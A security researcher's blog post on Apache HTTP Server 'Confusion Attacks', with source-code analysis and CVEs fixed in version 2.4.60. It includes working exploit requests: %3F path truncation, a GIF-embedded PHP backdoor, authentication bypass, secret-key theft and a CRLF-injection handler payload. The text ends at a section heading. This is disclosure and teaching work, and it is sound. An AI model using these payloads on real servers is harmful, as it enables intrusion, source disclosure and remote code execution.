2024年8月9日 星期五

[EN] Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!


Orange Tsai (@orange_8361)  |  繁體中文版本  |  English Version

Hey there! This is my research on Apache HTTP Server presented at Black Hat USA 2024. Additionally, this research will also be presented at HITCON and OrangeCon. If you’re interested in getting a preview, you can check the slides here:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Also, I would like to thank Akamai for their friendly outreach! They released mitigation measures immediately after this research was published (details can be found on Akamai’s blog).

TL;DR

This article explores architectural issues within the Apache HTTP Server, highlighting several technical debts within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. The content includes, but is not limited to:

  1. How a single ? can bypass Httpd’s built-in access control and authentication.
  2. How unsafe RewriteRules can escape the Web Root and access the entire filesystem.
  3. How to leverage a piece of code from 1996 to transform an XSS into RCE.

Outline

Before the Story

This section is just some personal murmurs. If you’re only interested in the technical details, jump straight to — How Did the Story Begin?

As a researcher, perhaps the greatest joy is seeing your work recognized and understood by peers. Therefore, after completing a significant research with fruitful results, it is natural to want the world to see it — which is why I’ve presented multiple times at Black Hat USA and DEFCON. As you might know, since 2022, I have been unable to obtain a valid travel authorization to enter the U.S. (For Taiwan, travel authorization under the Visa Waiver Program can typically be obtained online within minutes to hours), leading me to miss the in-person talk at Black Hat USA 2022. Even a solo trip to Machu Picchu and Easter Island in 2023 couldn’t transit through the U.S. :(

To address this situation, I started preparing for a B1/B2 visa in January this year, writing various documents, interviewing at the embassy, and endlessly waiting. It’s not fun. But to have my work seen, I still spent a lot of time seeking all possibilities, even until three weeks before the conference, it was unclear whether my talk would be canceled or not (BH only accepted in-person talks, but thanks to the RB, it could ultimately be presented in pre-recorded format). So, everything you see, including slides, videos, and this blog, was completed within just a few dozen days. 😖

As a pure researcher with a clear conscience, my attitude towards vulnerabilities has always been — they should be directly reported to and fixed by the vendor. Writing these words isn’t for any particular reason, just to record some feelings of helplessness, efforts in this year, and to thank those who have helped me this year, thank you all :)

How Did the Story Begin?

Around the beginning of this year, I started thinking about my next research target. As you might know, I always aim to challenge big targets that can impact the entire internet, so I began searching for some complex topics or interesting open-source projects like Nginx, PHP, or even delved into RFCs to strengthen my understanding of protocol details.

While most attempts ended in failure (though a few might become topics for next blog posts 😉), reading these codes reminded me of a quick review I had done of Apache HTTP Server last year! Although I didn’t dive deep into the code due to the work schedule, I had already “smelled” something not quite right about its coding style at that time.

So this year, I decided to continue on that research, transforming the “bad smells” from an indescribable “feeling” into concrete research on Apache HTTP Server!

Why Apache HTTP Server Smells Bad?

Firstly, the Apache HTTP Server is a world constructed by “modules,” as proudly declared in its official documentation regarding its modularity:

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

The entire Httpd service relies on hundreds of small modules working together to handle a client’s HTTP request. Among the 136 modules listed by the official documentation, about half are either enabled by default or frequently used by websites!

What’s even more surprising is that these modules also maintain a colossal request_rec structure while processing client HTTP requests. This structure includes all the elements involved in handling HTTP, with its detailed definition available in include/httpd.h. All modules depend on this massive structure for synchronization, communication, and data exchange. As an HTTP request passes through several phases, modules act like players in a game of catch, passing the structure from one to another. Each module even has the ability to modify any value in this structure according to its own preferences!

This type of collaboration is not new from a software engineering perspective. Each module simply focuses on its own task. As long as everyone finishes their work, then the client can enjoy the service provided by Httpd. This approach might work well with a few modules, but what happens when we scale it up to hundreds of modules collaborating — can they really work well together? 🤔

Our starting point is straightforward — the modules do not fully understand each other, yet they are required to cooperate. Each module might be implemented by different people, with the code undergoing years of iterations, refactors, and modifications. Do they really still know what they are doing? Even if they understand their own duty, what about other modules’ implementation details? Without any good development standards or guidelines, there must be several gaps that we can exploit!

A Whole New Attack — Confusion Attack

Based on these observations, we started focusing on the “relationships” and “interactions” among these modules. If a module accidentally modifies a structure field that it considers unimportant, but is crucial for another module, it could affect the latter’s decisions. Furthermore, if the definitions or semantics of the fields are not precise enough, causing ambiguities in how modules understand the same fields, it could lead to potential security risks as well!

From this starting point, we developed three different types of attacks, as these attacks are more or less related to the misuse of structure fields. Hence, we’ve named this attack surface “Confusion Attack,” and the following are the attacks we developed:

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

Through these attacks, we have identified 9 different vulnerabilities:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

These vulnerabilities were reported through the official security mailing list and were addressed by the Apache HTTP Server in the 2.4.60 update published on 2024-07-01.

As this is a new attack surface from Httpd’s architectural design and its internal mechanisms, naturally, the first person to delve into it can find the most vulnerabilities. Thus, I currently hold the most CVEs from Apache HTTP Server 😉. it leads to many updates that are not backward compatible. Therefore, patching these issues is not easy for many long-running production servers. If administrators update without careful consideration, they might disrupt existing configurations, causing service downtime. 😨

Now, it’s time to get started with our Confusion Attacks! Are you ready?

🔥 1. Filename Confusion

The first issue stems from confusion regarding the filename field. Literally, r->filename should represent a filesystem path. However, in Apache HTTP Server, some modules treat it as a URL. If, within an HTTP context, most modules consider r->filename as a filesystem path but some others treat it as a URL, this inconsistency can lead to security issues!

⚔️ Primitive 1-1. Truncation

So, which modules treat r->filename as a URL? The first is mod_rewrite, which allows sysadmins to easily rewrite a path pattern to a specified substitution target using the RewriteRule directive:

RewriteRule Pattern Substitution [flags]

The target can be either a filesystem path or a URL. This feature likely exists for user experience. However, this “convenience” also introduces risks. For instance, while rewriting the target paths, mod_rewrite forcefully treats all results as a URL, truncating the path after a question mark %3F. This leads to the following two exploitations.

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;
    
    // [...]
    
    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);
        
        // [...] do the remaining stuff
        
    }
    
    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);         // <------- [!!!] Truncate the `r->filename`
    
    // [...]
}
✔️ 1-1-1. Path Truncation

The first primitive leverages this truncation on the filesystem path. Imagine the following RewriteRule:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

The server would open the corresponding profile based on the username followed by the path /user/, for example:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

Since mod_rewrite forcibly treats all rewritten result as a URL, even when the target is a filesystem path, it can be truncated at a question mark, cutting off the tailing /profile.yml, like:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

This is our first primitive — Path Truncation. Let’s pause our exploration of this primitive here for a moment. Although it might seem like a minor flaw for now, remember it— it will reappear in later attacks, gradually tearing open this seemingly little breach! 😜

✔️ 1-1-2. Mislead RewriteFlag Assignment

The second exploitation of the truncation primitive is to mislead the assignment of RewriteFlags. Imagine a sysadmin managing websites and their corresponding handlers through the following RewriteRule:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

If a request ends with the .php extension, it adds the corresponding handler for the mod_php (this can also be an Environment Variable or Content-Type; you can refer to the official RewriteRule Flags manual for details).

Since the truncation behavior of the mod_rewrite occurs after the regular expression match, an attacker can use the original rule to apply flags to requests they shouldn’t apply to by using a ?. For example, an attacker could upload a GIF image embedded with malicious PHP code and execute it as a backdoor through the following crafted request:

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;>

$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

⚔️ Primitive 1-2. ACL Bypass

The second primitive of Filename Confusion occurs in the mod_proxy. Unlike the previous primitive which treats targets as a URL in all cases, this time the authentication and access control bypass is caused by the inconsistent semantic of r->filename among the modules!

It actually makes sense for the mod_proxy to treat r->filename as a URL, given that the primary purpose of a Proxy is to “redirect” requests to other URLs. However, security issues when different components interact — especially the case when most modules by default treat the r->filename as a filesystem path, imagine you use a file-based access control, and now mod_proxy treats r->filename as a URL; this inconsistency can lead to the access control or authentication bypass!

A classic example is when sysadmins use the Files directive to restrict a single file, like admin.php:

<Files "admin.php">
    AuthType Basic 
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

This type of configuration can be bypassed directly under the default PHP-FPM installation! It’s also worth mentioning that this is one of the most common ways to configure authentication in Apache HTTP Server! Suppose you visit a URL like this:

http://server/admin.php%3Fooo.php

First, in the HTTP lifecycle at this URL, the authentication module will compare the requested filename with the protected files. At this point, the r->filename field is admin.php?ooo.php, which obviously does not match admin.php, so the module will assume that the current request does not require authentication. However, the PHP-FPM configuration is set to forward requests ending in .php to the mod_proxy using the SetHandler directive:

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

The mod_proxy will rewrite r->filename to the following URL and call the sub-module mod_proxy_fcgi to handle the subsequent FastCGI protocol:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Since the backend receives the filename in a strange format, PHP-FPM has to handle this behavior specially. The logic of this handling is as follows:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p =0;
    }
}

As you can see, PHP-FPM first normalizes the filename and splits it at the question mark ? to extract the actual file path for execution (which is /var/www/html/admin.php). This leads to the bypass, and basically, all authentications or access controls based on the Files directive for a single PHP file are at risk when running together with PHP-FPM! 😮

Many potentially risky configurations can be found on GitHub, such as phpinfo() restricted to internal network access only:

# protect phpinfo, only allow localhost and local network access
<Files php-info.php>
    # LOCAL ACCESS ONLY
    # Require local 

    # LOCAL AND LAN ACCESS
    Require ip 10 172 192.168
</Files>

Adminer blocked by .htaccess:

<Files adminer.php>
    Order Allow,Deny
    Deny from all
</Files>

Protected xmlrpc.php:

<Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
</Files>

CLI tools prevented from direct access:

<Files "cron.php">
    Deny from all
</Files>

Through an inconsistency in how the authentication module and mod_proxy interpret the r->filename field, all the above examples can be successfully bypassed with just a ?.

🔥 2. DocumentRoot Confusion

The next attack we’re diving into is the confusion based on DocumentRoot! Let’s consider this Httpd configuration for a moment:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

When you visit the URL http://server/html/about, which file do you think Httpd actually opens? Is it the one under the root directory, /about.html, or is it from the DocumentRoot at /var/www/html/about.html?

The answer is — it accesses both paths. Yep, that’s our second Confusion Attack. For any[1] RewriteRule, Apache HTTP Server always tries to open both the path with DocumentRoot and without it! Amazing, right? 😉

[1] Located within Server Config or VirtualHost Block

Path: modules/mappers/mod_rewrite.c#L4939

    if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {     // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}

Most of the time, the version without DocumentRoot doesn’t exist, so Apache HTTP Server goes for the version with the DocumentRoot. But this behavior already lets us “intentionally” access paths outside the Web Root. If today we can control the prefix of the RewriteRule, couldn’t we access any file on the system? That’s the spirit of our second Confusion Attack! You can find numerous problematic configurations on GitHub, and even the examples from official Apache HTTP Server documentations are vulnerable to attacks:

# Remove mykey=???
RewriteCond "%{QUERY_STRING}" "(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"
RewriteRule "(.*)" "$1?%1%3"

There are other RewriteRule that are also affected, such as rules based on caching needs or hiding file extensions:

RewriteRule  "^/html/(.*)$"  "/$1.html"

The Rule trying to save bandwidth by opting for compressed versions of static files:

RewriteRule  "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

The rule redirecting old URLs to the main site:

RewriteRule  "^/oldwebsite/(.*)$"  "/$1"

The rule returning a 200 OK for all CORS preflight requests:

RewriteCond %{REQUEST_METHOD} OPTIONS
RewriteRule ^(.*)$ $1 [R=200,L]

Theoretically, as long as the target prefix of a RewriteRule is controllable, we can access nearly the entire filesystem. But from the real-world cases above, extensions like .html and .gz are the restrictions that keep us from being truly free. So, can we access files outside .html? I am not sure if you remember the primitive of Path Truncation from the Filename Confusion earlier? By combining these two primitives, we can freely access arbitrary files on the filesystem!

The following demonstrations are all based on this unsafe RewriteRule:

RewriteEngine On
RewriteRule  "^/html/(.*)$"  "/$1.html"

⚔️ Primitive 2-1. Server-Side Source Code Disclosure

Let’s introduce the first primitive of DocumentRoot Confusion — Arbitrary Server-Side Source Code Disclosure!

Since Apache HTTP Server decides whether to consider a file as a Server-Side Script based on the current directory or virtual host configuration, accessing target via an absolute path can confuse Httpd’s logic, causing it to leak contents that should have been executed as code.

✔️ 2-1-1. Disclose CGI Source Code

Starting with the disclosure of server-side CGI source code, since mod_cgi binds the CGI folder to a specified URL prefix via ScriptAlias, directly accessing a CGI file using its absolute path can leak its source code due to the change of URL prefix.

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi
$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl
 # use CGI;
 # ...
 # # the source code of download.cgi
✔️ 2-1-2. Disclose PHP Source Code

Next is the disclosure of server-side PHP source code. Given that PHP has numerous use cases, if PHP environments are applied only to specific directories or virtual hosts (which is common in web hosting), accessing PHP files from a virtual host which didn’t support PHP can disclose the source code!

For example, www.local and static.local are two websites hosted on the same server; www.local allows PHP execution while static.local only serves static files. Hence, you can disclose sensitive info from config.php like this:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php
$ curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
 # the source code of config.php

⚔️ Primitive 2-2. Local Gadgets Manipulation!

Next up is our second primitive — Local Gadgets Manipulation.

First, when we talked about “accessing any file on the filesystem,” did you wonder: “Hey, could an unsafe RewriteRule access /etc/passwd?” The answer is Yes, and also no. What?

Technically, the server does check if /etc/passwd exists, but Apache HTTP Server’s built-in access control blocks our access. Here’s a snippet from Apache HTTP Server’s configuration template:

<Directory />
    AllowOverride None
    Require all denied
</Directory>

You’ll notice it defaults to blocking access to the root directory / (Require all denied). So our “arbitrary file access” ability seems a bit less “any.” Does that mean the show’s over? Not really! We have already broken the trust of only-allowed-access to the DocumentRoot, it’s a significant step forward!

A closer inspection of different Httpd distributions reveals that Debian/Ubuntu operating systems by default allow /usr/share:

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

So, the next step is to “squeeze” all possibilities within this directory. All available resources, such as existing tutorials, documentation, unit test files, and even programming languages like PHP, Python, and even PHP modules could become targets for our abuse!

P.S. Of course, the exploitation here is based on the Httpd distributed by Ubuntu/Debian operating systems. However, in practice, we have also found that some applications remove the Require all denied line from the root directory, allowing direct access to /etc/passwd.

✔️ 2-2-1. Local Gadget to Information Disclosure

Let’s hunt for potentially exploitable files in this directory. First off, if the target Apache HTTP Server has the websocketd service installed, the default package includes an example PHP script dump-env.php under /usr/share/doc/websocketd/examples/php/. If there’s a PHP environment on the target server, this script can be accessed directly to leak sensitive environment variables.

Additionally, if the target has services like Nginx or Jetty installed, though /usr/share is theoretically a read-only copy for package installation, these services still place their default Web Roots under /usr/share, making it possible to leak sensitive web application information, such as the web.xml in Jetty.

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

Here’s a simple demonstration using setup.php from the Davical package, which exists as a read-only copy, to leak contents of phpinfo().

✔️ 2-2-2. Local Gadget to XSS

Next, how to turn this primitive into XSS? On the Ubuntu Desktop environment, LibreOffice, an open-source office suite, is installed by default. We can leverage the language switch feature in the help files to achieve XSS.

Path: /usr/share/libreoffice/help/help.html

    var url = window.location.href;
    var n = url.indexOf('?');
    if (n != -1) {
        // the URL came from LibreOffice help (F1)
        var version = getParameterByName("Version", url);
        var query = url.substr(n + 1, url.length);
        var newURL = version + '/index.html?' + query;
        window.location.replace(newURL);
    } else {
        window.location.replace('latest/index.html');
    }

Thus, even if the target hasn’t deployed any web application, we can still create XSS using an unsafe RewriteRule through files that come within the operating system.

✔️ 2-2-3. Local Gadget to LFI

What about arbitrary file reading? If the target server has PHP or frontend packages installed, like JpGraph, jQuery-jFeed, or even WordPress or Moodle plugins, their tutorials or debug consoles can become our gadgets, for example:

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Here’s a simple example exploiting proxy.php from jQuery-jFeed to read /etc/passwd:

✔️ 2-2-4. Local Gadget to SSRF

Finding an SSRF vulnerability is also a piece of cake, for instance, MagpieRSS offers a magpie_debug.php file, which is fabulous gadget for exploiting:

  • /usr/share/php/magpierss/scripts/magpie_debug.php
✔️ 2-2-5. Local Gadget to RCE

So, can we achieve RCE? Hold on, let’s take it step by step! First, This primitive can reapply all known existing attacks again, like an old version of PHPUnit left behind by development or third-party dependencies, can be directly exploited using CVE-2017-9841 to execute arbitrary code. Or phpLiteAdmin installed with a read-only copy, which by default has the password admin. By now, you should see the vast potential of Local Gadgets Manipulation. What remains is to discover even more powerful and universal gadgets!

⚔️ Primitive 2-3. Jailbreak from Local Gadgets

You might ask: “Can’t we really break out of /usr/share?” Of course, we can, that brings out our third primitive — Jailbreak from /usr/share!

In Debian/Ubuntu distributions of Httpd, the FollowSymLinks option is explicitly enabled by default. Even in non-Debian/Ubuntu versions, Apache HTTP Server also implicitly allows Symbolic Links by default.

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>
✔️ 2-3-1. Jailbreak from Local Gadgets

So, any package that has a Symbolic Link in its installation directory pointing outside of /usr/share can become a stepping-stone to access more gadgets for further exploitation. Here are some useful Symbolic Links we’ve discovered so far:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

To wrap up our jailbreak primitive, let’s showcase how to perform an RCE using a double-hop Symbolic Link in Redmine. In the default installation of Redmine, there’s an instances/ folder pointing to /var/lib/redmine/, and within /var/lib/redmine/, the default/config/ folder points to the /etc/redmine/default/ directory, which holds Redmine’s database setting and secret key.

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

Thus, through an insecure RewriteRule and two Symbolic Links, we can easily access the application secret key used by Redmine:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

And since Redmine is a Ruby on Rails application, the content of secret_key.txt is actually the key used for signing and encrypting. The next step should be familiar to those who have attacked RoR before: by embedding malicious Marshal objects, signed and encrypted with the known keys, into cookies, and then achieving remote code execution through Server-Side Deserialization!

🔥 3. Handler Confusion

The final attack I’m going to introduce is the confusion based on Handler. This attack also leverages a piece of technical debt that has been left over from the legacy architecture of Apache HTTP Server. Let’s quickly understand this technical debt through an example — if today you want to run the classic mod_php on Apache HTTP Server, which of the following two directives do you use?

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

The answer is — both can correctly get PHP running! Here are the two directive syntaxes, and you can see that not only are the usages similar, but even the effects are exactly the same. Why did Apache HTTP Server initially design two different directives doing the same thing?

AddHandler handler-name extension [extension] ...
AddType media-type extension [extension] ...

Actually, handler-name and media-type represent different fields within Httpd’s internal structure, corresponding to r->handler and r->content_type, respectively. The fact that users can use them interchangeably without realizing it is thanks to a piece of code that has been in Apache HTTP Server since its early development in 1996:

Path: server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) {

    // [...]

    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p=ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2='\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

You can see that before entering the ap_run_handler(), if r->handler is empty, the content of the r->content_type is used as the final module handler. This is also why AddType and AddHandler have the identical effect, because the media-type is eventually converted into the handler-name before handling. So, our third Handler Confusion is mainly developed around this behavior.

⚔️ Primitive 3-1. Overwrite the Handler

By understanding this conversion mechanism, the first primitive is — Overwrite the Handler. Imagine if today the target Apache HTTP Server uses AddType to run PHP.

AddType application/x-httpd-php  .php

In the normal process, when accessing http://server/config.php, mod_mime, during the type_checker phase, Httpd copies the corresponding content into r->content_type based on the file extension set by AddType. Since r->handler is not assigned during the entire HTTP lifecycle, ap_invoke_handler() will treat r->content_type as the handler, ultimately calling mod_php to handle the request.

However, what happens if any module “accidentally” overwrites r->content_type before reaching ap_invoke_handler()?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

The first exploitation of this primitive is to disclose arbitrary PHP source code by the “accidentally-overwrite”. This technique was first mentioned by Max Dmitriev in his research presented at ZeroNights 2021 (kudos to him!), and you can check his slides here:

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

Max Dmitriev observed that by sending an incorrect Content-Length, the remote Httpd server would trigger an unexpected error and inadvertently return the source code of PHP script. Upon investigating the process, he discovered that the issue was due to ModSecurity not properly handling the return value of AP_FILTER_ERROR while using the Apache Portable Runtime (APR) library, leading to a double response. When an error occurred, Httpd attempts to send out HTML error messages, thus accidentally overwriting r->content_type to text/html.

Because ModSecurity did not properly handle the return values, the internal HTTP lifecycle that should have stopped continued. This “side effect” also overwrote the originally added Content-Type, resulting in files that should have been processed as PHP being treated as plain documents, exposing its source code and sensitive settings. 🤫

$ curl -v http://127.0.0.1/info.php -H "Content-Length: x"
> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
...
<?php phpinfo();?>

In theory, all configurations based on Content-Type are vulnerable to this type of attack, so apart from the php-cgi paired with mod_actions shown in Max’s slides, pure mod_php coupled with AddType is also affected.

It’s worth mentioning that this side effect was corrected as a request parser bug in Apache HTTP Server version 2.4.44, thus treating this “vulnerability” as fixed until I picked it up again. However, since the root cause is still ModSecurity not handling errors properly, the same behavior can still be successfully reproduced if another code path that triggers AP_FILTER_ERROR is found.

P.S. This issue was reported to ModSecurity through the official security mail on 6/20, and the Project Co-Leader suggested returning to the original GitHub Issue for discussion.

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

Based on the double response behavior and its side effects mentioned earlier, this primitive could lead to other more cool exploitations. However, as this issue has not been fully fixed, further exploitation will be disclosed after the issue is fully resolved.

⚔️ Primitive 3-2. Invoke Arbitrary Handlers

Let’s think more carefully about the previous Overwrite Handler primitive, although it’s caused by ModSecurity not properly handling errors, leading to the request being set with the wrong Content-Type, the deeper fundamental root cause should be — when using r->content_type, Apache HTTP Server actually cannot distinguish its semantics; this field can be set by directive during the request phase or used as the Content-Type header in the server response.

Theoretically, if you can control the Content-Type header in the server response, you could invoke arbitrary module handlers through this legacy code snippet. This is the last primitive of Handler Confusion — invoking any internal module handler!

However, there’s still one last piece of the puzzle. In Httpd, all modifications to r->content_type from the server response occur after that legacy code. So, even if you can control the value of that field, at that point in the HTTP lifecycle, it’s too late to do further exploitation… is that right?

We turned to RFC 3875 for a rescue! RFC 3875 is a specification about CGI, and Section 6.2.2 defines a Local Redirect Response behavior:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Simply put, the specification mandates that under certain conditions, CGI must use Server-Side resources to handle redirects. A close examination of mod_cgi implementation of this specification reveals:

Path: modules/generators/mod_cgi.c#L983

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,          // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {          // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                     // <------ [3]
        return OK;
    }

Initially, mod_cgi executes[1] CGI and scans its output to set the corresponding headers such as Status and Content-Type. If[2] the returned Status is 200 and the Location header starts with a /, the response is treated as a Server-Side Redirection and should be processed[3] internally. A closer look at the implementation of ap_internal_redirect_handler() shows:

Path: modules/http/http_request.c#L800

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

Httpd first creates[1] a new request structure and copie[2] the current r->content_type into it. After processing[3] the lifecycle, it calls[4] ap_invoke_handler() — the place including the legacy transformation. So, in Server-Side Redirects, if you can control the response headers, you can invoke any module handler within Httpd. Basically, all CGI implementations in Apache HTTP Server follow this behavior, and here’s a simple list:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi

As for how to trigger this server-side redirect in real-world scenarios? Since you need at least control over the response’s Content-Type and part of the Location, here are two scenarios for reference:

  1. CRLF Injection in the CGI response headers, allowing overwriting of existing HTTP headers by new lines.
  2. SSRF that can completely control the response headers, such as a project hosted on mod_wsgi like django-revproxy.

The following examples are all based on this insecure CRLF Injection for the purpose of demonstration:

#!/usr/bin/perl 
 
use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";
✔️ 3-2-1. Arbitrary Handler to Information Disclosure

Starting with invoking an arbitrary handler to disclose information, we use the built-in server-status handler in Apache HTTP Server, which is typically only allowed to be accessed locally:

<Location /server-status>
    SetHandler server-status
    Require local
</Location>

With the ability to invoke any handler, it becomes possible to overwrite the Content-Type to access sensitive information that should not be accessible remotely:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

